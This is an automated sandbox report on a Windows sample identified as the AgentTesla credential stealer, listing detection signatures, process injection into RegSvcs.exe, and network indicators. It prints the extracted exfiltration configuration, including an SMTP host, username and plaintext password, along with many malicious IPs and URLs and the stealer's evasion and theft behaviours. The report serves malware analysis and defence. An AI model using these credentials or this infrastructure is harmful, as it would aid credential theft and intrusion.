Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe

Overview

General Information

Sample name:SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
Analysis ID:1397655
MD5:26c95e5acba77d7fd14d109c94f75cca
SHA1:56359d96cd63d66b51eb49acd46d8df25f170c30
SHA256:32272f676a500007b4321f7c076ec3169305615e230dad3d89c63e0cfd24c1c6
Tags:exe
Infos:

Detection

AgentTesla
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus detection for URL or domain
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for submitted file
Yara detected AgentTesla
Yara detected AntiVM3
Yara detected UAC Bypass using CMSTP
.NET source code references suspicious native API functions
Check if machine is in data center or colocation facility
Connects to many IPs within the same subnet mask (likely port scanning)
Connects to many ports of the same IP (likely port scanning)
Contains functionality to check if a debugger is running (CheckRemoteDebuggerPresent)
Contains functionality to log keystrokes (.Net Source)
Injects a PE file into a foreign processes
Machine Learning detection for sample
Performs DNS queries to domains with low reputation
Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)
Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
Sigma detected: Bad Opsec Defaults Sacrificial Processes With Improper Arguments
Sigma detected: Outbound RDP Connections Over Non-Standard Tools
Sigma detected: Potentially Suspicious Malware Callback Communication
Sigma detected: Suspicious Outbound Kerberos Connection
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Uses known network protocols on non-standard ports
Writes to foreign memory regions
Yara detected Generic Downloader
Abnormal high CPU Usage
Allocates memory with a write watch (potentially for evading sandboxes)
Binary contains a suspicious time stamp
Checks if the current process is being debugged
Connects to several IPs in different countries
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May check the online IP address of the machine
May sleep (evasive loops) to hinder dynamic analysis
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
PE file does not import any functions
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: Communication To Uncommon Destination Ports
Sigma detected: Suspicious DNS Query for IP Lookup Service APIs
Sigma detected: Suspicious Outbound SMTP Connections
Tries to load missing DLLs
Uses SMTP (mail sending)
Yara detected Credential Stealer
Yara signature match

Classification

Process Tree

  • System is w10x64
  • SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe (PID: 5828 cmdline: C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe MD5: 26C95E5ACBA77D7FD14D109C94F75CCA)
    • RegSvcs.exe (PID: 22352 cmdline: C:\Windows\Microsoft.NET\Framework\v4.0.30319\regsvcs.exe MD5: 9D352BC46709F0CB5EC974633A0C3C94)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
Agent Tesla, AgentTeslaA .NET based information stealer readily available to actors due to leaked builders. The malware is able to log keystrokes, can access the host's clipboard and crawls the disk for credentials or other valuable information. It has the capability to send information back to its C&C via HTTP(S), SMTP, FTP, or towards a Telegram channel.
  • SWEED
https://malpedia.caad.fkie.fraunhofer.de/details/win.agent_tesla

Malware Configuration

Threatname: Agenttesla

{"Exfil Mode": "SMTP", "Port": "587", "Host": "mail.supplyvan.xyz", "Username": "otu@supplyvan.xyz", "Password": "Ifeanyi1987@"}

Yara Signatures

PCAP (Network Traffic)

SourceRuleDescriptionAuthorStrings
dump.pcapJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security

    Memory Dumps

    SourceRuleDescriptionAuthorStrings
    00000004.00000002.2757087631.0000000000402000.00000040.00000400.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
      00000004.00000002.2757087631.0000000000402000.00000040.00000400.00020000.00000000.sdmpJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
        00000004.00000002.2764598895.0000000002C71000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
          00000004.00000002.2764598895.0000000002C71000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
            00000000.00000002.2049795050.00000194D9427000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
              Click to see the 12 entries

              Unpacked PEs

              SourceRuleDescriptionAuthorStrings
              4.2.RegSvcs.exe.400000.0.unpackJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
                4.2.RegSvcs.exe.400000.0.unpackJoeSecurity_GenericDownloader_1Yara detected Generic DownloaderJoe Security
                  4.2.RegSvcs.exe.400000.0.unpackJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
                    4.2.RegSvcs.exe.400000.0.unpackINDICATOR_SUSPICIOUS_EXE_VaultSchemaGUIDDetects executables referencing Windows vault credential objects. Observed in infostealersditekSHen
                    • 0x34257:$s1: 2F1A6504-0641-44CF-8BB5-3612D865F2E5
                    • 0x342c9:$s2: 3CCD5499-87A8-4B10-A215-608888DD3B55
                    • 0x34353:$s3: 154E23D0-C644-4E6F-8CE6-5069272F999F
                    • 0x343e5:$s4: 4BF4C442-9B8A-41A0-B380-DD4A704DDB28
                    • 0x3444f:$s5: 77BC582B-F0A6-4E15-4E80-61736B6F3B29
                    • 0x344c1:$s6: E69D7838-91B5-4FC9-89D5-230D4D4CC2BC
                    • 0x34557:$s7: 3E0E35BE-1B77-43E7-B873-AED901B6275B
                    • 0x345e7:$s8: 3C886FF3-2669-4AA2-A8FB-3F6759A77548
                    0.2.SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe.194d94271b0.2.unpackJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
                      Click to see the 13 entries

                      Sigma Signatures

                      System Summary

                      barindex
                      Sigma detected: Bad Opsec Defaults Sacrificial Processes With Improper Arguments
                      Source: Process startedAuthor: Oleg Kolesnikov @securonix invrep_de, oscd.community, Florian Roth (Nextron Systems), Christian Burkard (Nextron Systems): Data: Command: C:\Windows\Microsoft.NET\Framework\v4.0.30319\regsvcs.exe, CommandLine: C:\Windows\Microsoft.NET\Framework\v4.0.30319\regsvcs.exe, CommandLine|base64offset|contains: , Image: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe, NewProcessName: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe, OriginalFileName: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe, ParentCommandLine: C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, ParentImage: C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, ParentProcessId: 5828, ParentProcessName: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, ProcessCommandLine: C:\Windows\Microsoft.NET\Framework\v4.0.30319\regsvcs.exe, ProcessId: 22352, ProcessName: RegSvcs.exe
                      Sigma detected: Outbound RDP Connections Over Non-Standard Tools
                      Source: Network ConnectionAuthor: Markus Neis: Data: DestinationIp: 125.227.225.157, DestinationIsIpv6: false, DestinationPort: 3389, EventID: 3, Image: C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, Initiated: true, ProcessId: 5828, Protocol: tcp, SourceIp: 192.168.2.8, SourceIsIpv6: false, SourcePort: 53022
                      Sigma detected: Potentially Suspicious Malware Callback Communication
                      Source: Network ConnectionAuthor: Florian Roth (Nextron Systems): Data: DestinationIp: 123.30.154.171, DestinationIsIpv6: false, DestinationPort: 7777, EventID: 3, Image: C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, Initiated: true, ProcessId: 5828, Protocol: tcp, SourceIp: 192.168.2.8, SourceIsIpv6: false, SourcePort: 50044
                      Sigma detected: Suspicious Outbound Kerberos Connection
                      Source: Network ConnectionAuthor: Ilyas Ochkov, oscd.community: Data: DestinationIp: 5.161.103.41, DestinationIsIpv6: false, DestinationPort: 88, EventID: 3, Image: C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, Initiated: true, ProcessId: 5828, Protocol: tcp, SourceIp: 192.168.2.8, SourceIsIpv6: false, SourcePort: 52170
                      Sigma detected: Communication To Uncommon Destination Ports
                      Source: Network ConnectionAuthor: Florian Roth (Nextron Systems): Data: DestinationIp: 115.96.208.124, DestinationIsIpv6: false, DestinationPort: 8080, EventID: 3, Image: C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, Initiated: true, ProcessId: 5828, Protocol: tcp, SourceIp: 192.168.2.8, SourceIsIpv6: false, SourcePort: 49723
                      Sigma detected: Suspicious DNS Query for IP Lookup Service APIs
                      Source: DNS queryAuthor: Brandon George (blog post), Thomas Patzke: Data: Image: C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, QueryName: ip-api.com
                      Sigma detected: Suspicious Outbound SMTP Connections
                      Source: Network ConnectionAuthor: frack113: Data: DestinationIp: 160.248.80.91, DestinationIsIpv6: false, DestinationPort: 587, EventID: 3, Image: C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, Initiated: true, ProcessId: 5828, Protocol: tcp, SourceIp: 192.168.2.8, SourceIsIpv6: false, SourcePort: 54070

                      Snort Signatures

                      No Snort rule has matched

                      Joe Sandbox Signatures

                      Click to jump to signature section

                      Show All Signature Results

                      AV Detection

                      barindex
                      Antivirus detection for URL or domain
                      Source: http://192.140.42.83:31511Avira URL Cloud: Label: malware
                      Found malware configuration
                      Source: 4.2.RegSvcs.exe.400000.0.unpackMalware Configuration Extractor: Agenttesla {"Exfil Mode": "SMTP", "Port": "587", "Host": "mail.supplyvan.xyz", "Username": "otu@supplyvan.xyz", "Password": "Ifeanyi1987@"}
                      Multi AV Scanner detection for domain / URL
                      Source: heygirlisheeverythingyouwantedinaman.comVirustotal: Detection: 20%Perma Link
                      Source: http://188.164.193.178:30744Virustotal: Detection: 10%Perma Link
                      Source: http://184.178.172.25:15291Virustotal: Detection: 6%Perma Link
                      Source: http://192.140.42.83:31511Virustotal: Detection: 7%Perma Link
                      Source: http://161.97.170.209:13636://proxyVirustotal: Detection: 6%Perma Link
                      Multi AV Scanner detection for submitted file
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exeVirustotal: Detection: 31%Perma Link
                      Machine Learning detection for sample
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exeJoe Sandbox ML: detected

                      Exploits

                      barindex
                      Yara detected UAC Bypass using CMSTP
                      Source: Yara matchFile source: 00000000.00000002.1796025652.00000194CD2A8000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe PID: 5828, type: MEMORYSTR
                      Source: unknownHTTPS traffic detected: 140.82.113.4:443 -> 192.168.2.8:49709 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 172.67.190.93:443 -> 192.168.2.8:51842 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 172.67.190.93:443 -> 192.168.2.8:52896 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 102.223.20.217:443 -> 192.168.2.8:53182 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 222.255.238.159:443 -> 192.168.2.8:55101 version: TLS 1.2
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exeStatic PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

                      Networking

                      barindex
                      Connects to many IPs within the same subnet mask (likely port scanning)
                      Source: global trafficTCP traffic: Count: 11 IPs: 212.110.188.189,212.110.188.222,212.110.188.202,212.110.188.213,212.110.188.220,212.110.188.198,212.110.188.193,212.110.188.195,212.110.188.204,212.110.188.216,212.110.188.207
                      Source: global trafficTCP traffic: Count: 10 IPs: 103.47.93.214,103.47.93.236,103.47.93.245,103.47.93.196,103.47.93.250,103.47.93.194,103.47.93.25,103.47.93.199,103.47.93.252,103.47.93.241
                      Source: global trafficTCP traffic: Count: 11 IPs: 197.234.13.46,197.234.13.24,197.234.13.49,197.234.13.66,197.234.13.5,197.234.13.94,197.234.13.93,197.234.13.82,197.234.13.30,197.234.13.63,197.234.13.52
                      Source: global trafficTCP traffic: Count: 14 IPs: 188.132.222.171,188.132.222.168,188.132.222.8,188.132.222.7,188.132.222.199,188.132.222.166,188.132.222.167,188.132.222.44,188.132.222.6,188.132.222.5,188.132.222.39,188.132.222.38,188.132.222.34,188.132.222.14
                      Source: global trafficTCP traffic: Count: 10 IPs: 72.10.160.170,72.10.160.91,72.10.160.90,72.10.160.174,72.10.160.173,72.10.160.172,72.10.160.171,72.10.160.93,72.10.160.92,72.10.160.94
                      Source: global trafficTCP traffic: Count: 11 IPs: 184.178.172.13,184.178.172.23,184.178.172.26,184.178.172.25,184.178.172.14,184.178.172.17,184.178.172.28,184.178.172.3,184.178.172.5,184.178.172.18,184.178.172.11
                      Connects to many ports of the same IP (likely port scanning)
                      Source: global trafficTCP traffic: 5.42.81.57 ports 14021,30829,0,32105,2,3,8,9
                      Source: global trafficTCP traffic: 43.128.155.154 ports 15673,1,3,5,6,7
                      Source: global trafficTCP traffic: 178.32.143.55 ports 0,2,3,32048,4,8
                      Source: global trafficTCP traffic: 92.205.105.134 ports 39058,60516,1,63718,3,6,7,8,17317
                      Source: global trafficTCP traffic: 188.164.193.178 ports 7001,9733,63078,12880,15342,0,30663,4,6,8,47573,60484,37842,5348,46392,30744,35626
                      Source: global trafficTCP traffic: 45.11.95.165 ports 5031,6031,5032,5022,5000,6049,5014,5037,5040,0,2,5,5214,5039,5029,5206,6008
                      Source: global trafficTCP traffic: 109.123.254.43 ports 62183,42048,14474,40667,18072,36076,41049,9066,0,31167,12339,4,51584,34476,6,7,24210,58917,51856
                      Source: global trafficTCP traffic: 67.213.210.118 ports 65149,1,4,5,6,9
                      Source: global trafficTCP traffic: 212.3.112.128 ports 0,3,5,6,35860,8
                      Source: global trafficTCP traffic: 92.246.139.113 ports 12250,2,3,4,32244,13852,14427,10203
                      Source: global trafficTCP traffic: 92.246.139.112 ports 0,10008,3,4,5,30504
                      Source: global trafficTCP traffic: 92.246.139.106 ports 1,2,3,4,11432,16901,33328
                      Source: global trafficTCP traffic: 162.144.32.209 ports 23847,2,3,4,58740,7,8
                      Source: global trafficTCP traffic: 148.72.23.56 ports 41383,39396,36111,1,3,6,46451
                      Source: global trafficTCP traffic: 218.75.69.50 ports 0,3,5,7,9,57903
                      Source: global trafficTCP traffic: 92.204.135.4 ports 44712,1,2,4,58754,7
                      Source: global trafficTCP traffic: 51.38.14.161 ports 23306,0,51392,2,3,6,32229
                      Source: global trafficTCP traffic: 166.62.38.100 ports 8730,1,55671,5,6,7,2453,4765,39308
                      Source: global trafficTCP traffic: 92.205.110.47 ports 17158,50709,1,5,7,8,50228,55509
                      Source: global trafficTCP traffic: 175.139.179.65 ports 0,2,4,5,8,42580
                      Source: global trafficTCP traffic: 161.97.147.193 ports 15371,19655,43131,1,3,5,7,37257,2838
                      Source: global trafficTCP traffic: 185.45.73.227 ports 53491,1,2,3,4,25298,8,31428
                      Source: global trafficTCP traffic: 82.223.121.72 ports 63596,3,4,5,54368,6,8
                      Source: global trafficTCP traffic: 72.10.160.90 ports 20057,16355,15265,25421,29129,22575,7481,18939,3279,15863,8609,24091,16757,3093,20421,6047,11351,26447,1,3,2597,7,9,7249,8833,19713
                      Source: global trafficTCP traffic: 152.228.140.225 ports 28119,1,4,14719,7,9
                      Source: global trafficTCP traffic: 72.10.160.92 ports 18445,22575,0,2,26077,6,7,1839,16757
                      Source: global trafficTCP traffic: 147.45.40.15 ports 1,30463,3,31554,4,5,33736
                      Source: global trafficTCP traffic: 51.15.209.188 ports 1,3,6,7,9,16379
                      Source: global trafficTCP traffic: 72.10.160.170 ports 5385,19551,23333,1,2,2413,3819,8,9,29053,12899,30569
                      Source: global trafficTCP traffic: 209.145.56.51 ports 6432,36195,51060,2,3,4,6,18508
                      Source: global trafficTCP traffic: 72.10.160.173 ports 27707,3283,2,3,1475,8,10677
                      Source: global trafficTCP traffic: 72.10.160.171 ports 20003,4,5,8,6227,9,5369,8459
                      Source: global trafficTCP traffic: 154.12.253.232 ports 17970,8541,62276,41277,25158,57661,25007,0,2,5,7,52138,38338,54506,16504
                      Source: global trafficTCP traffic: 148.72.212.212 ports 3,6,7,8,3786,48131
                      Source: global trafficTCP traffic: 173.249.33.122 ports 62690,19633,8221,5640,26686,27427,0,16708,4,5,6,49851,44194,52019,17827,45241,49382
                      Source: global trafficTCP traffic: 191.103.219.225 ports 48612,1,2,4,6,8
                      Source: global trafficTCP traffic: 51.158.105.203 ports 1,3,6,7,9,16379
                      Source: global trafficTCP traffic: 167.172.109.12 ports 39452,46249,39533,37355,40825,2,4,6,9,41491
                      Source: global trafficTCP traffic: 161.97.173.42 ports 46018,2724,3,4,5,8,9,53948
                      Source: global trafficTCP traffic: 207.180.226.58 ports 60909,54690,62978,59932,64608,2,3,51276,56001,5,9
                      Source: global trafficTCP traffic: 91.150.189.122 ports 0,60647,30389,3,8,9
                      Source: global trafficTCP traffic: 185.23.118.97 ports 2,59946,4,5,6,54625
                      Source: global trafficTCP traffic: 173.212.237.43 ports 44672,20592,2,57118,54099,4,6,7,61211,39545,14549
                      Source: global trafficTCP traffic: 91.108.130.111 ports 0,2,3,32650,5,6
                      Source: global trafficTCP traffic: 161.97.173.78 ports 7818,2,5,6,7,8,52876
                      Source: global trafficTCP traffic: 66.29.128.244 ports 42560,0,2,4,5,6
                      Source: global trafficTCP traffic: 103.28.86.241 ports 57230,0,2,3,5,7
                      Source: global trafficTCP traffic: 107.148.97.234 ports 58394,3,4,5,8,9
                      Source: global trafficTCP traffic: 159.203.137.249 ports 0,30433,3,4,49785,5018
                      Source: global trafficTCP traffic: 161.97.163.52 ports 4085,55491,0,31125,4,5,29631,8,45063,34916,13106
                      Source: global trafficTCP traffic: 146.190.84.209 ports 9445,62842,33091,2,4,26154,6,8
                      Source: global trafficTCP traffic: 167.99.39.82 ports 46523,46015,0,1,4,5,6,13486,28140
                      Source: global trafficTCP traffic: 154.236.189.15 ports 1976,1,6,1981,7,9
                      Source: global trafficTCP traffic: 54.36.108.149 ports 13331,40996,5170,3,5,6,7,56367,13882,13304
                      Source: global trafficTCP traffic: 145.239.2.102 ports 15460,14075,42147,48821,59990,28501,1,56732,2,59522,6,29631,8,13247,53728,62181,3769
                      Source: global trafficTCP traffic: 79.143.187.58 ports 38971,59410,0,1,4,1730,17905,5,55215,9
                      Source: global trafficTCP traffic: 91.203.114.71 ports 0,2,4,42905,5,9
                      Source: global trafficTCP traffic: 5.161.98.204 ports 22019,58199,3240,3,5,2662,11232,9,37901,53935
                      Source: global trafficTCP traffic: 51.222.241.8 ports 29877,0,55452,5,6,50565,36411
                      Source: global trafficTCP traffic: 162.214.162.180 ports 9251,1,55189,2,5,9
                      Source: global trafficTCP traffic: 41.217.220.214 ports 0,2,3,32650,5,6
                      Source: global trafficTCP traffic: 213.136.75.85 ports 59058,0,3,5,7,50573,57607
                      Source: global trafficTCP traffic: 197.254.84.86 ports 0,2,3,32650,5,6
                      Source: global trafficTCP traffic: 162.19.7.50 ports 50847,0,4,5,7,8
                      Source: global trafficTCP traffic: 125.25.40.41 ports 0,2,3,32650,5,6
                      Source: global trafficTCP traffic: 51.75.125.208 ports 15084,41649,18080,62727,2,33356,6,7,54879
                      Source: global trafficTCP traffic: 173.212.240.168 ports 20341,39180,0,1,58854,3,8,9,10267
                      Source: global trafficTCP traffic: 51.210.4.123 ports 58244,61802,2,56238,4,58653,5,55774,8,52614,57969
                      Source: global trafficTCP traffic: 195.138.73.54 ports 44017,0,1,31145,4,7
                      Source: global trafficTCP traffic: 109.104.187.212 ports 41890,0,1,4,8,9
                      Source: global trafficTCP traffic: 148.66.130.53 ports 56350,0,1,2,5,47011,12005
                      Source: global trafficTCP traffic: 171.244.10.204 ports 47875,43012,61700,57930,55145,4,5,7,52178,8,15389
                      Source: global trafficTCP traffic: 185.198.58.47 ports 0,27890,2,7,8,9
                      Source: global trafficTCP traffic: 50.63.12.33 ports 23859,61464,34644,40838,3,14738,4,50781,6,23065,58507,30920
                      Source: global trafficTCP traffic: 51.15.230.100 ports 1,3,6,7,9,16379
                      Source: global trafficTCP traffic: 148.66.130.187 ports 17772,43804,0,3,6,8,60083
                      Source: global trafficTCP traffic: 141.94.174.6 ports 39796,59583,2450,35072,47913,35557,1772,60870,49675,7856,40280,13326,45620,41866,41920,26422,25214,57470,33466,3,33346,4,13718,6,2935,16526,1647
                      Source: global trafficTCP traffic: 108.181.133.59 ports 28916,1,2,6,8,9
                      Source: global trafficTCP traffic: 164.132.112.254 ports 1,2,3,19919,5,9,31259
                      Source: global trafficTCP traffic: 51.89.173.40 ports 17982,44719,26545,54570,23313,23854,20435,0,2,3,55198,4,5,51511
                      Source: global trafficTCP traffic: 50.63.13.3 ports 6164,25710,12539,1,34677,3,53005,6,7,12035,4214,44392,1938,11673,30704
                      Source: global trafficTCP traffic: 194.163.129.179 ports 19202,21912,33093,26659,1,2,31158,5,51212,16517
                      Source: global trafficTCP traffic: 161.97.160.158 ports 42543,58943,1,59778,3,4,13994,9,11018,5814
                      Source: global trafficTCP traffic: 51.210.45.148 ports 8772,19873,41855,9351,60359,3,5,6,8,11176,36424,36721,3865
                      Source: global trafficTCP traffic: 178.128.82.105 ports 39993,58899,2,3,5,53299,9,2706
                      Source: global trafficTCP traffic: 138.201.21.232 ports 48915,1,4,5,8,9
                      Source: global trafficTCP traffic: 66.228.33.190 ports 2,5,29566,6,48487,9,36702
                      Source: global trafficTCP traffic: 8.213.129.15 ports 8060,8080,0,443,5,50
                      Source: global trafficTCP traffic: 125.229.149.168 ports 65110,65100,0,1,5,6
                      Source: global trafficTCP traffic: 198.12.253.1 ports 49878,0,1,3,6,7,37106,3820,50205
                      Source: global trafficTCP traffic: 115.171.217.48 ports 7891,7890,0,7,8,9
                      Source: global trafficTCP traffic: 138.197.92.110 ports 21346,2,3,5,35982,8,9
                      Source: global trafficTCP traffic: 208.109.14.49 ports 63470,46047,59760,1,3,5,6,8,7218,35618
                      Source: global trafficTCP traffic: 178.18.248.104 ports 1,3,4,5,9,49153
                      Source: global trafficTCP traffic: 163.172.144.132 ports 1,3,6,7,9,16379
                      Source: global trafficTCP traffic: 156.200.116.74 ports 1976,1,6,1981,7,9
                      Source: global trafficTCP traffic: 46.182.6.69 ports 41041,63049,0,1,25295,4,46383
                      Source: global trafficTCP traffic: 66.228.35.209 ports 14321,46695,23344,2,4,6,29466,9
                      Source: global trafficTCP traffic: 104.128.103.32 ports 64312,1,2,3,4,6
                      Source: global trafficTCP traffic: 103.121.90.216 ports 15463,6422,44419,8680,1,3,4,5,6,6546,15229
                      Source: global trafficTCP traffic: 165.227.104.122 ports 41443,29992,3,5,8,9,58839
                      Source: global trafficTCP traffic: 151.236.39.7 ports 58111,60637,57248,2,4,5,7,8
                      Source: global trafficTCP traffic: 103.29.90.66 ports 0,2,3,32650,5,6
                      Source: global trafficTCP traffic: 167.172.159.43 ports 48983,1,3,8,9,60153,32988,13988
                      Source: global trafficTCP traffic: 5.252.23.206 ports 1080,1,2,3,3128,8
                      Source: global trafficTCP traffic: 94.23.220.136 ports 25256,0,3,5,8,21062,35805,19547
                      Source: global trafficTCP traffic: 51.15.240.207 ports 1,3,6,7,9,16379
                      Source: global trafficTCP traffic: 162.240.19.133 ports 38673,3,6,7,8,42690,51226
                      Source: global trafficTCP traffic: 124.158.182.34 ports 7654,10808,4,5,6,7
                      Source: global trafficTCP traffic: 37.187.73.7 ports 12582,1,2,5,8,64052
                      Source: global trafficTCP traffic: 107.180.101.18 ports 46503,21643,1,3,33302,27053,59368,26850,7,8,3663,37411,38117,5855,32925
                      Source: global trafficTCP traffic: 109.205.181.27 ports 16296,48977,7663,1,2,6,25783,9,15737,2419
                      Source: global trafficTCP traffic: 216.10.242.18 ports 40571,0,3,4,9,9735,3409
                      Source: global trafficTCP traffic: 104.238.111.107 ports 5484,5452,45883,3230,23667,0,56225,2,30026,3,15419,60214,36049,6,7757,7999,53777
                      Source: global trafficTCP traffic: 12.218.209.130 ports 53281,1,2,3,5,8
                      Source: global trafficTCP traffic: 161.97.170.209 ports 16521,4441,61841,2296,43129,1,4,12641,30529,47570,13636
                      Source: global trafficTCP traffic: 37.228.65.107 ports 0,1,2,51032,3,5
                      Source: global trafficTCP traffic: 65.49.82.7 ports 40202,24258,0,2,4,46770,31977
                      Source: global trafficTCP traffic: 82.113.157.122 ports 31280,0,1,2,3,8
                      Source: global trafficTCP traffic: 51.158.105.107 ports 1,3,6,7,9,16379
                      Source: global trafficTCP traffic: 107.180.89.55 ports 25508,0,1,2,4,9,12940
                      Source: global trafficTCP traffic: 162.240.10.35 ports 37761,0,4,5,6,7,32671,47056
                      Source: global trafficTCP traffic: 107.180.103.214 ports 45870,17084,0,1,4,7,8
                      Source: global trafficTCP traffic: 194.233.78.142 ports 49628,42420,39067,43274,46115,39852,36431,35760,41119,1,34953,4,30295,31681,33551,34199,9,35906,39833,47152
                      Source: global trafficTCP traffic: 207.244.252.14 ports 62963,54190,2,3,55842,6,9
                      Source: global trafficTCP traffic: 167.99.123.158 ports 48953,57581,27237,59431,1546,2,3,50450,7,60880,34913
                      Source: global trafficTCP traffic: 92.204.134.38 ports 52929,25825,15393,38044,42571,2,1555,5,54467,28695,7,9,12752,59727
                      Source: global trafficTCP traffic: 146.59.178.222 ports 1,2,12438,3,4,8
                      Source: global trafficTCP traffic: 188.164.197.178 ports 1,3,36139,6,45086,9
                      Source: global trafficTCP traffic: 51.15.254.129 ports 1,3,6,7,9,16379
                      Source: global trafficTCP traffic: 196.202.210.73 ports 0,2,3,32650,5,6
                      Source: global trafficTCP traffic: 109.238.12.156 ports 46962,29834,1163,61743,27241,1,3,4,26770,6,7,22472,55724
                      Source: global trafficTCP traffic: 162.210.192.136 ports 26719,15095,1,2,6,7,9
                      Source: global trafficTCP traffic: 103.113.71.230 ports 1080,1081,1,2,3,3128,8
                      Source: global trafficTCP traffic: 41.65.236.35 ports 1976,1,6,1981,7,9
                      Source: global trafficTCP traffic: 67.43.227.228 ports 24805,9039,25813,0,3,30883,17719,8,6933,32425
                      Source: global trafficTCP traffic: 67.43.227.227 ports 17685,9023,16251,19567,14681,18475,31071,20469,1,3739,4,3621,6,32065,8,10011,18309,4479,32425,13897,10863
                      Source: global trafficTCP traffic: 67.43.227.226 ports 25639,22775,2,3,10867,5,6,9,30999
                      Source: global trafficTCP traffic: 51.79.87.144 ports 8533,22500,1,3,54395,6,8,18636
                      Source: global trafficTCP traffic: 147.45.40.89 ports 33054,0,34006,3,4,6
                      Source: global trafficTCP traffic: 75.119.145.154 ports 17621,1,2,6,7,21072
                      Source: global trafficTCP traffic: 98.162.25.4 ports 1,31654,3,4,5,6
                      Source: global trafficTCP traffic: 197.248.86.237 ports 0,2,3,32650,5,6
                      Source: global trafficTCP traffic: 41.65.236.57 ports 1976,1,6,1981,7,9
                      Source: global trafficTCP traffic: 75.119.145.169 ports 21039,10293,14166,25323,0,4,5,7,8,48057,28040
                      Source: global trafficTCP traffic: 67.43.228.253 ports 12361,7491,28143,1,14869,4,7,20371,3993,9,4789,11983,3889
                      Source: global trafficTCP traffic: 107.180.101.226 ports 1,2,5,23031,6,59810,51526,6539
                      Source: global trafficTCP traffic: 104.248.158.78 ports 61725,1,2,5,6,7
                      Source: global trafficTCP traffic: 5.9.98.142 ports 3080,3233,2692,3000,0,3129,3,8,3629
                      Source: global trafficTCP traffic: 92.204.136.149 ports 16686,12570,17270,0,1,2,7
                      Source: global trafficTCP traffic: 50.63.12.101 ports 61797,3580,32423,2,2953,3,10647,5,9
                      Source: global trafficTCP traffic: 148.72.177.90 ports 63853,28106,63218,27727,64947,3,5,2466,6,25211,8
                      Source: global trafficTCP traffic: 139.162.181.177 ports 1,27660,5,6,9,19659
                      Source: global trafficTCP traffic: 8.213.128.6 ports 11,20002,9992,8080,2020,8,9,7777,8118,8889
                      Source: global trafficTCP traffic: 117.160.250.163 ports 8080,8081,9990,0,8,80,81,82,9999,8828
                      Source: global trafficTCP traffic: 162.215.223.71 ports 47933,3,5,8,9,38958
                      Source: global trafficTCP traffic: 186.215.87.194 ports 6000,6025,6002,8896,0,2,6
                      Source: global trafficTCP traffic: 132.148.129.254 ports 41026,45366,63418,0,1,6,7,8,60781
                      Source: global trafficTCP traffic: 54.39.50.68 ports 44884,44612,20132,24535,1,2,4,6
                      Source: global trafficTCP traffic: 188.164.196.31 ports 49426,62105,2,4,6,52359,9
                      Source: global trafficTCP traffic: 140.227.61.156 ports 23456,2,3,4,5,6
                      Source: global trafficTCP traffic: 162.240.21.140 ports 32060,3,4,5,6,9,46395
